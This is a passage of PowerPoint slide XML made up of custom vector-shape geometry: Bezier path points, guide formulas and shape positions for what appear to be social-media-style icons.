                    <a:pt x="342655" y="74263"/>
                    <a:pt x="334454" y="94697"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="326254" y="115131"/>
                    <a:pt x="329982" y="126199"/>
                    <a:pt x="316939" y="174999"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="296102" y="242622"/>
                    <a:pt x="276174" y="279635"/>
                    <a:pt x="184305" y="311458"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="152057" y="320905"/>
                    <a:pt x="83508" y="315693"/>
                    <a:pt x="27716" y="295316"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="281129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="268036"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23178" y="266110"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="63548" y="261698"/>
                    <a:pt x="90116" y="254801"/>
                    <a:pt x="108726" y="240807"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="87700" y="241375"/>
                    <a:pt x="35310" y="244403"/>
                    <a:pt x="20535" y="200079"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37583" y="203299"/>
                    <a:pt x="59856" y="197334"/>
                    <a:pt x="70653" y="194871"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="57204" y="189662"/>
                    <a:pt x="37595" y="181773"/>
                    <a:pt x="20899" y="168840"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="146258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="116697"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14104" y="121836"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="23887" y="123910"/>
                    <a:pt x="33812" y="125203"/>
                    <a:pt x="40441" y="126434"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9945" y="103325"/>
                    <a:pt x="-5039" y="60063"/>
                    <a:pt x="20722" y="8541"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="76047" y="73391"/>
                    <a:pt x="116697" y="97001"/>
                    <a:pt x="168525" y="104817"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="166649" y="98530"/>
                    <a:pt x="164888" y="89662"/>
                    <a:pt x="165796" y="68430"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="166838" y="44047"/>
                    <a:pt x="190944" y="0"/>
                    <a:pt x="241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CDE015-9AA0-4BE4-A6D9-52CC6CFD2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9375" y="4197069"/>
              <a:ext cx="172150" cy="348350"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst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432915 w 432915"/>
                <a:gd name="connsiteY2" fmla="*/ 455920 h 455920"/>
                <a:gd name="connsiteX3" fmla="*/ 313271 w 432915"/>
                <a:gd name="connsiteY3" fmla="*/ 455920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367184 w 432915"/>
                <a:gd name="connsiteY8" fmla="*/ 6 h 455920"/>
                <a:gd name="connsiteX9" fmla="*/ 399197 w 432915"/>
                <a:gd name="connsiteY9" fmla="*/ 2823 h 455920"/>
                <a:gd name="connsiteX10" fmla="*/ 393797 w 432915"/>
                <a:gd name="connsiteY10" fmla="*/ 69600 h 455920"/>
                <a:gd name="connsiteX11" fmla="*/ 313271 w 432915"/>
                <a:gd name="connsiteY11" fmla="*/ 96177 h 455920"/>
                <a:gd name="connsiteX12" fmla="*/ 313271 w 432915"/>
                <a:gd name="connsiteY12" fmla="*/ 140898 h 455920"/>
                <a:gd name="connsiteX13" fmla="*/ 391059 w 432915"/>
                <a:gd name="connsiteY13" fmla="*/ 140898 h 455920"/>
                <a:gd name="connsiteX14" fmla="*/ 385514 w 432915"/>
                <a:gd name="connsiteY14" fmla="*/ 215050 h 455920"/>
                <a:gd name="connsiteX15" fmla="*/ 313271 w 432915"/>
                <a:gd name="connsiteY15" fmla="*/ 216436 h 455920"/>
                <a:gd name="connsiteX16" fmla="*/ 313271 w 432915"/>
                <a:gd name="connsiteY16" fmla="*/ 455355 h 455920"/>
                <a:gd name="connsiteX17" fmla="*/ 228291 w 432915"/>
                <a:gd name="connsiteY17" fmla="*/ 455355 h 455920"/>
                <a:gd name="connsiteX18" fmla="*/ 228291 w 432915"/>
                <a:gd name="connsiteY18" fmla="*/ 216436 h 455920"/>
                <a:gd name="connsiteX19" fmla="*/ 173888 w 432915"/>
                <a:gd name="connsiteY19" fmla="*/ 216436 h 455920"/>
                <a:gd name="connsiteX20" fmla="*/ 173888 w 432915"/>
                <a:gd name="connsiteY20" fmla="*/ 140898 h 455920"/>
                <a:gd name="connsiteX21" fmla="*/ 228291 w 432915"/>
                <a:gd name="connsiteY21" fmla="*/ 140898 h 455920"/>
                <a:gd name="connsiteX22" fmla="*/ 228291 w 432915"/>
                <a:gd name="connsiteY22" fmla="*/ 90429 h 455920"/>
                <a:gd name="connsiteX23" fmla="*/ 228151 w 432915"/>
                <a:gd name="connsiteY23" fmla="*/ 89940 h 455920"/>
                <a:gd name="connsiteX24" fmla="*/ 324674 w 432915"/>
                <a:gd name="connsiteY24" fmla="*/ 971 h 455920"/>
                <a:gd name="connsiteX25" fmla="*/ 367184 w 432915"/>
                <a:gd name="connsiteY25" fmla="*/ 6 h 455920"/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313271 w 432915"/>
                <a:gd name="connsiteY2" fmla="*/ 455920 h 455920"/>
                <a:gd name="connsiteX3" fmla="*/ 313271 w 432915"/>
                <a:gd name="connsiteY3" fmla="*/ 455355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0 w 432915"/>
                <a:gd name="connsiteY8" fmla="*/ 455355 h 455920"/>
                <a:gd name="connsiteX9" fmla="*/ 367184 w 432915"/>
                <a:gd name="connsiteY9" fmla="*/ 6 h 455920"/>
                <a:gd name="connsiteX10" fmla="*/ 399197 w 432915"/>
                <a:gd name="connsiteY10" fmla="*/ 2823 h 455920"/>
                <a:gd name="connsiteX11" fmla="*/ 393797 w 432915"/>
                <a:gd name="connsiteY11" fmla="*/ 69600 h 455920"/>
                <a:gd name="connsiteX12" fmla="*/ 313271 w 432915"/>
                <a:gd name="connsiteY12" fmla="*/ 96177 h 455920"/>
                <a:gd name="connsiteX13" fmla="*/ 313271 w 432915"/>
                <a:gd name="connsiteY13" fmla="*/ 140898 h 455920"/>
                <a:gd name="connsiteX14" fmla="*/ 391059 w 432915"/>
                <a:gd name="connsiteY14" fmla="*/ 140898 h 455920"/>
                <a:gd name="connsiteX15" fmla="*/ 385514 w 432915"/>
                <a:gd name="connsiteY15" fmla="*/ 215050 h 455920"/>
                <a:gd name="connsiteX16" fmla="*/ 313271 w 432915"/>
                <a:gd name="connsiteY16" fmla="*/ 216436 h 455920"/>
                <a:gd name="connsiteX17" fmla="*/ 313271 w 432915"/>
                <a:gd name="connsiteY17" fmla="*/ 455355 h 455920"/>
                <a:gd name="connsiteX18" fmla="*/ 228291 w 432915"/>
                <a:gd name="connsiteY18" fmla="*/ 455355 h 455920"/>
                <a:gd name="connsiteX19" fmla="*/ 228291 w 432915"/>
                <a:gd name="connsiteY19" fmla="*/ 216436 h 455920"/>
                <a:gd name="connsiteX20" fmla="*/ 173888 w 432915"/>
                <a:gd name="connsiteY20" fmla="*/ 216436 h 455920"/>
                <a:gd name="connsiteX21" fmla="*/ 173888 w 432915"/>
                <a:gd name="connsiteY21" fmla="*/ 140898 h 455920"/>
                <a:gd name="connsiteX22" fmla="*/ 228291 w 432915"/>
                <a:gd name="connsiteY22" fmla="*/ 140898 h 455920"/>
                <a:gd name="connsiteX23" fmla="*/ 228291 w 432915"/>
                <a:gd name="connsiteY23" fmla="*/ 90429 h 455920"/>
                <a:gd name="connsiteX24" fmla="*/ 228151 w 432915"/>
                <a:gd name="connsiteY24" fmla="*/ 89940 h 455920"/>
                <a:gd name="connsiteX25" fmla="*/ 324674 w 432915"/>
                <a:gd name="connsiteY25" fmla="*/ 971 h 455920"/>
                <a:gd name="connsiteX26" fmla="*/ 367184 w 432915"/>
                <a:gd name="connsiteY26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355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0 w 399197"/>
                <a:gd name="connsiteY7" fmla="*/ 455355 h 455920"/>
                <a:gd name="connsiteX8" fmla="*/ 367184 w 399197"/>
                <a:gd name="connsiteY8" fmla="*/ 6 h 455920"/>
                <a:gd name="connsiteX9" fmla="*/ 399197 w 399197"/>
                <a:gd name="connsiteY9" fmla="*/ 2823 h 455920"/>
                <a:gd name="connsiteX10" fmla="*/ 393797 w 399197"/>
                <a:gd name="connsiteY10" fmla="*/ 69600 h 455920"/>
                <a:gd name="connsiteX11" fmla="*/ 313271 w 399197"/>
                <a:gd name="connsiteY11" fmla="*/ 96177 h 455920"/>
                <a:gd name="connsiteX12" fmla="*/ 313271 w 399197"/>
                <a:gd name="connsiteY12" fmla="*/ 140898 h 455920"/>
                <a:gd name="connsiteX13" fmla="*/ 391059 w 399197"/>
                <a:gd name="connsiteY13" fmla="*/ 140898 h 455920"/>
                <a:gd name="connsiteX14" fmla="*/ 385514 w 399197"/>
                <a:gd name="connsiteY14" fmla="*/ 215050 h 455920"/>
                <a:gd name="connsiteX15" fmla="*/ 313271 w 399197"/>
                <a:gd name="connsiteY15" fmla="*/ 216436 h 455920"/>
                <a:gd name="connsiteX16" fmla="*/ 313271 w 399197"/>
                <a:gd name="connsiteY16" fmla="*/ 455355 h 455920"/>
                <a:gd name="connsiteX17" fmla="*/ 228291 w 399197"/>
                <a:gd name="connsiteY17" fmla="*/ 455355 h 455920"/>
                <a:gd name="connsiteX18" fmla="*/ 228291 w 399197"/>
                <a:gd name="connsiteY18" fmla="*/ 216436 h 455920"/>
                <a:gd name="connsiteX19" fmla="*/ 173888 w 399197"/>
                <a:gd name="connsiteY19" fmla="*/ 216436 h 455920"/>
                <a:gd name="connsiteX20" fmla="*/ 173888 w 399197"/>
                <a:gd name="connsiteY20" fmla="*/ 140898 h 455920"/>
                <a:gd name="connsiteX21" fmla="*/ 228291 w 399197"/>
                <a:gd name="connsiteY21" fmla="*/ 140898 h 455920"/>
                <a:gd name="connsiteX22" fmla="*/ 228291 w 399197"/>
                <a:gd name="connsiteY22" fmla="*/ 90429 h 455920"/>
                <a:gd name="connsiteX23" fmla="*/ 228151 w 399197"/>
                <a:gd name="connsiteY23" fmla="*/ 89940 h 455920"/>
                <a:gd name="connsiteX24" fmla="*/ 324674 w 399197"/>
                <a:gd name="connsiteY24" fmla="*/ 971 h 455920"/>
                <a:gd name="connsiteX25" fmla="*/ 367184 w 399197"/>
                <a:gd name="connsiteY25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920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367184 w 399197"/>
                <a:gd name="connsiteY7" fmla="*/ 6 h 455920"/>
                <a:gd name="connsiteX8" fmla="*/ 399197 w 399197"/>
                <a:gd name="connsiteY8" fmla="*/ 2823 h 455920"/>
                <a:gd name="connsiteX9" fmla="*/ 393797 w 399197"/>
                <a:gd name="connsiteY9" fmla="*/ 69600 h 455920"/>
                <a:gd name="connsiteX10" fmla="*/ 313271 w 399197"/>
                <a:gd name="connsiteY10" fmla="*/ 96177 h 455920"/>
                <a:gd name="connsiteX11" fmla="*/ 313271 w 399197"/>
                <a:gd name="connsiteY11" fmla="*/ 140898 h 455920"/>
                <a:gd name="connsiteX12" fmla="*/ 391059 w 399197"/>
                <a:gd name="connsiteY12" fmla="*/ 140898 h 455920"/>
                <a:gd name="connsiteX13" fmla="*/ 385514 w 399197"/>
                <a:gd name="connsiteY13" fmla="*/ 215050 h 455920"/>
                <a:gd name="connsiteX14" fmla="*/ 313271 w 399197"/>
                <a:gd name="connsiteY14" fmla="*/ 216436 h 455920"/>
                <a:gd name="connsiteX15" fmla="*/ 313271 w 399197"/>
                <a:gd name="connsiteY15" fmla="*/ 455355 h 455920"/>
                <a:gd name="connsiteX16" fmla="*/ 228291 w 399197"/>
                <a:gd name="connsiteY16" fmla="*/ 455355 h 455920"/>
                <a:gd name="connsiteX17" fmla="*/ 228291 w 399197"/>
                <a:gd name="connsiteY17" fmla="*/ 216436 h 455920"/>
                <a:gd name="connsiteX18" fmla="*/ 173888 w 399197"/>
                <a:gd name="connsiteY18" fmla="*/ 216436 h 455920"/>
                <a:gd name="connsiteX19" fmla="*/ 173888 w 399197"/>
                <a:gd name="connsiteY19" fmla="*/ 140898 h 455920"/>
                <a:gd name="connsiteX20" fmla="*/ 228291 w 399197"/>
                <a:gd name="connsiteY20" fmla="*/ 140898 h 455920"/>
                <a:gd name="connsiteX21" fmla="*/ 228291 w 399197"/>
                <a:gd name="connsiteY21" fmla="*/ 90429 h 455920"/>
                <a:gd name="connsiteX22" fmla="*/ 228151 w 399197"/>
                <a:gd name="connsiteY22" fmla="*/ 89940 h 455920"/>
                <a:gd name="connsiteX23" fmla="*/ 324674 w 399197"/>
                <a:gd name="connsiteY23" fmla="*/ 971 h 455920"/>
                <a:gd name="connsiteX24" fmla="*/ 367184 w 399197"/>
                <a:gd name="connsiteY24" fmla="*/ 6 h 455920"/>
                <a:gd name="connsiteX0" fmla="*/ 139383 w 225309"/>
                <a:gd name="connsiteY0" fmla="*/ 455355 h 455920"/>
                <a:gd name="connsiteX1" fmla="*/ 139383 w 225309"/>
                <a:gd name="connsiteY1" fmla="*/ 455920 h 455920"/>
                <a:gd name="connsiteX2" fmla="*/ 139383 w 225309"/>
                <a:gd name="connsiteY2" fmla="*/ 455355 h 455920"/>
                <a:gd name="connsiteX3" fmla="*/ 54403 w 225309"/>
                <a:gd name="connsiteY3" fmla="*/ 455920 h 455920"/>
                <a:gd name="connsiteX4" fmla="*/ 54403 w 225309"/>
                <a:gd name="connsiteY4" fmla="*/ 455355 h 455920"/>
                <a:gd name="connsiteX5" fmla="*/ 54403 w 225309"/>
                <a:gd name="connsiteY5" fmla="*/ 455920 h 455920"/>
                <a:gd name="connsiteX6" fmla="*/ 193296 w 225309"/>
                <a:gd name="connsiteY6" fmla="*/ 6 h 455920"/>
                <a:gd name="connsiteX7" fmla="*/ 225309 w 225309"/>
                <a:gd name="connsiteY7" fmla="*/ 2823 h 455920"/>
                <a:gd name="connsiteX8" fmla="*/ 219909 w 225309"/>
                <a:gd name="connsiteY8" fmla="*/ 69600 h 455920"/>
                <a:gd name="connsiteX9" fmla="*/ 139383 w 225309"/>
                <a:gd name="connsiteY9" fmla="*/ 96177 h 455920"/>
                <a:gd name="connsiteX10" fmla="*/ 139383 w 225309"/>
                <a:gd name="connsiteY10" fmla="*/ 140898 h 455920"/>
                <a:gd name="connsiteX11" fmla="*/ 217171 w 225309"/>
                <a:gd name="connsiteY11" fmla="*/ 140898 h 455920"/>
                <a:gd name="connsiteX12" fmla="*/ 211626 w 225309"/>
                <a:gd name="connsiteY12" fmla="*/ 215050 h 455920"/>
                <a:gd name="connsiteX13" fmla="*/ 139383 w 225309"/>
                <a:gd name="connsiteY13" fmla="*/ 216436 h 455920"/>
                <a:gd name="connsiteX14" fmla="*/ 139383 w 225309"/>
                <a:gd name="connsiteY14" fmla="*/ 455355 h 455920"/>
                <a:gd name="connsiteX15" fmla="*/ 54403 w 225309"/>
                <a:gd name="connsiteY15" fmla="*/ 455355 h 455920"/>
                <a:gd name="connsiteX16" fmla="*/ 54403 w 225309"/>
                <a:gd name="connsiteY16" fmla="*/ 216436 h 455920"/>
                <a:gd name="connsiteX17" fmla="*/ 0 w 225309"/>
                <a:gd name="connsiteY17" fmla="*/ 216436 h 455920"/>
                <a:gd name="connsiteX18" fmla="*/ 0 w 225309"/>
                <a:gd name="connsiteY18" fmla="*/ 140898 h 455920"/>
                <a:gd name="connsiteX19" fmla="*/ 54403 w 225309"/>
                <a:gd name="connsiteY19" fmla="*/ 140898 h 455920"/>
                <a:gd name="connsiteX20" fmla="*/ 54403 w 225309"/>
                <a:gd name="connsiteY20" fmla="*/ 90429 h 455920"/>
                <a:gd name="connsiteX21" fmla="*/ 54263 w 225309"/>
                <a:gd name="connsiteY21" fmla="*/ 89940 h 455920"/>
                <a:gd name="connsiteX22" fmla="*/ 150786 w 225309"/>
                <a:gd name="connsiteY22" fmla="*/ 971 h 455920"/>
                <a:gd name="connsiteX23" fmla="*/ 193296 w 225309"/>
                <a:gd name="connsiteY23" fmla="*/ 6 h 45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309" h="455920">
                  <a:moveTo>
                    <a:pt x="139383" y="455355"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="139383" y="455920"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139383" y="455355"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="54403" y="455920"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="54403" y="455355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54403" y="455920"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="193296" y="6"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="204595" y="73"/>
                    <a:pt x="214144" y="770"/>
                    <a:pt x="225309" y="2823"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="225271" y="27274"/>
                    <a:pt x="222913" y="50194"/>
                    <a:pt x="219909" y="69600"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="188141" y="67117"/>
                    <a:pt x="138250" y="66776"/>
                    <a:pt x="139383" y="96177"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="139383" y="140898"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="217171" y="140898"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="211626" y="215050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139383" y="216436"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139383" y="455355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54403" y="455355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54403" y="216436"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="216436"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="140898"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54403" y="140898"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54403" y="90429"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="54356" y="90266"/>
                    <a:pt x="54310" y="90103"/>
                    <a:pt x="54263" y="89940"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54393" y="21715"/>
                    <a:pt x="104084" y="2174"/>
                    <a:pt x="150786" y="971"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="168948" y="503"/>
                    <a:pt x="181997" y="-60"/>
                    <a:pt x="19329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5435E4-A5D2-465D-AC14-AC1BE0EA5AAA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8105957" y="3478924"/>
              <a:ext cx="284621" cy="282605"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 249204 w 299575"/>
                <a:gd name="connsiteY0" fmla="*/ 123541 h 297454"/>
                <a:gd name="connsiteX1" fmla="*/ 241250 w 299575"/>
                <a:gd name="connsiteY1" fmla="*/ 136266 h 297454"/>
                <a:gd name="connsiteX2" fmla="*/ 229055 w 299575"/>
                <a:gd name="connsiteY2" fmla="*/ 198302 h 297454"/>
                <a:gd name="connsiteX3" fmla="*/ 116648 w 299575"/>
                <a:gd name="connsiteY3" fmla="*/ 234888 h 297454"/>
                <a:gd name="connsiteX4" fmla="*/ 59914 w 299575"/>
                <a:gd name="connsiteY4" fmla="*/ 135736 h 297454"/>
                <a:gd name="connsiteX5" fmla="*/ 58324 w 299575"/>
                <a:gd name="connsiteY5" fmla="*/ 125662 h 297454"/>
                <a:gd name="connsiteX6" fmla="*/ 36585 w 299575"/>
                <a:gd name="connsiteY6" fmla="*/ 125131 h 297454"/>
                <a:gd name="connsiteX7" fmla="*/ 31813 w 299575"/>
                <a:gd name="connsiteY7" fmla="*/ 137857 h 297454"/>
                <a:gd name="connsiteX8" fmla="*/ 31813 w 299575"/>
                <a:gd name="connsiteY8" fmla="*/ 247082 h 297454"/>
                <a:gd name="connsiteX9" fmla="*/ 51961 w 299575"/>
                <a:gd name="connsiteY9" fmla="*/ 266701 h 297454"/>
                <a:gd name="connsiteX10" fmla="*/ 150052 w 299575"/>
                <a:gd name="connsiteY10" fmla="*/ 266701 h 297454"/>
                <a:gd name="connsiteX11" fmla="*/ 250794 w 299575"/>
                <a:gd name="connsiteY11" fmla="*/ 266701 h 297454"/>
                <a:gd name="connsiteX12" fmla="*/ 269352 w 299575"/>
                <a:gd name="connsiteY12" fmla="*/ 250264 h 297454"/>
                <a:gd name="connsiteX13" fmla="*/ 269352 w 299575"/>
                <a:gd name="connsiteY13" fmla="*/ 134675 h 297454"/>
                <a:gd name="connsiteX14" fmla="*/ 261863 w 299575"/>
                <a:gd name="connsiteY14" fmla="*/ 123541 h 297454"/>
                <a:gd name="connsiteX15" fmla="*/ 249204 w 299575"/>
                <a:gd name="connsiteY15" fmla="*/ 123541 h 297454"/>
                <a:gd name="connsiteX16" fmla="*/ 151642 w 299575"/>
                <a:gd name="connsiteY16" fmla="*/ 88016 h 297454"/>
                <a:gd name="connsiteX17" fmla="*/ 89076 w 299575"/>
                <a:gd name="connsiteY17" fmla="*/ 147931 h 297454"/>
                <a:gd name="connsiteX18" fmla="*/ 150582 w 299575"/>
                <a:gd name="connsiteY18" fmla="*/ 208377 h 297454"/>
                <a:gd name="connsiteX19" fmla="*/ 212088 w 299575"/>
                <a:gd name="connsiteY19" fmla="*/ 148461 h 297454"/>
                <a:gd name="connsiteX20" fmla="*/ 151642 w 299575"/>
                <a:gd name="connsiteY20" fmla="*/ 88016 h 297454"/>
                <a:gd name="connsiteX21" fmla="*/ 234357 w 299575"/>
                <a:gd name="connsiteY21" fmla="*/ 29162 h 297454"/>
                <a:gd name="connsiteX22" fmla="*/ 203605 w 299575"/>
                <a:gd name="connsiteY22" fmla="*/ 60444 h 297454"/>
                <a:gd name="connsiteX23" fmla="*/ 235948 w 299575"/>
                <a:gd name="connsiteY23" fmla="*/ 92258 h 297454"/>
                <a:gd name="connsiteX24" fmla="*/ 268822 w 299575"/>
                <a:gd name="connsiteY24" fmla="*/ 59914 h 297454"/>
                <a:gd name="connsiteX25" fmla="*/ 268822 w 299575"/>
                <a:gd name="connsiteY25" fmla="*/ 53552 h 297454"/>
                <a:gd name="connsiteX26" fmla="*/ 245492 w 299575"/>
                <a:gd name="connsiteY26" fmla="*/ 29162 h 297454"/>
                <a:gd name="connsiteX27" fmla="*/ 234357 w 299575"/>
                <a:gd name="connsiteY27" fmla="*/ 29162 h 297454"/>
                <a:gd name="connsiteX28" fmla="*/ 41887 w 299575"/>
                <a:gd name="connsiteY28" fmla="*/ 0 h 297454"/>
                <a:gd name="connsiteX29" fmla="*/ 258217 w 299575"/>
                <a:gd name="connsiteY29" fmla="*/ 0 h 297454"/>
                <a:gd name="connsiteX30" fmla="*/ 299575 w 299575"/>
                <a:gd name="connsiteY30" fmla="*/ 41887 h 297454"/>
                <a:gd name="connsiteX31" fmla="*/ 299575 w 299575"/>
                <a:gd name="connsiteY31" fmla="*/ 255567 h 297454"/>
                <a:gd name="connsiteX32" fmla="*/ 257687 w 299575"/>
                <a:gd name="connsiteY32" fmla="*/ 297454 h 297454"/>
                <a:gd name="connsiteX33" fmla="*/ 149522 w 299575"/>
                <a:gd name="connsiteY33" fmla="*/ 297454 h 297454"/>
                <a:gd name="connsiteX34" fmla="*/ 41357 w 299575"/>
                <a:gd name="connsiteY34" fmla="*/ 297454 h 297454"/>
                <a:gd name="connsiteX35" fmla="*/ 0 w 299575"/>
                <a:gd name="connsiteY35" fmla="*/ 256096 h 297454"/>
                <a:gd name="connsiteX36" fmla="*/ 0 w 299575"/>
                <a:gd name="connsiteY36" fmla="*/ 41357 h 297454"/>
                <a:gd name="connsiteX37" fmla="*/ 41887 w 299575"/>
                <a:gd name="connsiteY37" fmla="*/ 0 h 29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9575" h="297454">
                  <a:moveTo>
                    <a:pt x="249204" y="123541"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="240190" y="123011"/>
                    <a:pt x="239659" y="128843"/>
                    <a:pt x="241250" y="136266"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="245492" y="158536"/>
                    <a:pt x="240720" y="179214"/>
                    <a:pt x="229055" y="198302"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="206255" y="234888"/>
                    <a:pt x="158536" y="250264"/>
                    <a:pt x="116648" y="234888"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="83774" y="222692"/>
                    <a:pt x="50901" y="185577"/>
                    <a:pt x="59914" y="135736"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="60444" y="132555"/>
                    <a:pt x="62565" y="127252"/>
                    <a:pt x="58324" y="125662"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="51431" y="122481"/>
                    <a:pt x="43477" y="123541"/>
                    <a:pt x="36585" y="125131"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30222" y="126722"/>
                    <a:pt x="31813" y="133085"/>
                    <a:pt x="31813" y="137857"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="31813" y="174442"/>
                    <a:pt x="31813" y="210497"/>
                    <a:pt x="31813" y="247082"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="31813" y="262989"/>
                    <a:pt x="35524" y="266701"/>
                    <a:pt x="51961" y="266701"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="84835" y="266701"/>
                    <a:pt x="117178" y="266701"/>
                    <a:pt x="150052" y="266701"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="183456" y="266701"/>
                    <a:pt x="217390" y="266701"/>
                    <a:pt x="250794" y="266701"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="262459" y="266701"/>
                    <a:pt x="269352" y="261929"/>
                    <a:pt x="269352" y="250264"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="269352" y="211558"/>
                    <a:pt x="269352" y="173382"/>
                    <a:pt x="269352" y="134675"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="268822" y="126987"/>
                    <a:pt x="265773" y="124337"/>
                    <a:pt x="261863" y="123541"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="257952" y="122746"/>
                    <a:pt x="253180" y="123806"/>
                    <a:pt x="249204" y="123541"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="151642" y="88016"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="116648" y="87486"/>
                    <a:pt x="89076" y="113997"/>
                    <a:pt x="89076" y="147931"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="89076" y="180805"/>
                    <a:pt x="117178" y="208377"/>
                    <a:pt x="150582" y="208377"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="183986" y="208377"/>
                    <a:pt x="212088" y="181335"/>
                    <a:pt x="212088" y="148461"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="212088" y="115058"/>
                    <a:pt x="185577" y="88546"/>
                    <a:pt x="151642" y="88016"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="234357" y="29162"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="207846" y="29162"/>
                    <a:pt x="204135" y="32873"/>
                    <a:pt x="203605" y="60444"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="203605" y="90137"/>
                    <a:pt x="205195" y="92258"/>
                    <a:pt x="235948" y="92258"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="267762" y="92258"/>
                    <a:pt x="268822" y="91197"/>
                    <a:pt x="268822" y="59914"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="268822" y="57794"/>
                    <a:pt x="268822" y="55673"/>
                    <a:pt x="268822" y="53552"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="268822" y="35524"/>
                    <a:pt x="263519" y="29692"/>
                    <a:pt x="245492" y="29162"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="241781" y="29162"/>
                    <a:pt x="238069" y="29162"/>
                    <a:pt x="234357" y="29162"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="41887" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="113998" y="0"/>
                    <a:pt x="186108" y="0"/>
                    <a:pt x="258217" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="284728" y="0"/>
                    <a:pt x="299575" y="14846"/>
                    <a:pt x="299575" y="41887"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="299575" y="112937"/>
                    <a:pt x="299575" y="184517"/>
                    <a:pt x="299575" y="255567"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="299575" y="283138"/>
                    <a:pt x="285789" y="297454"/>
                    <a:pt x="257687" y="297454"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
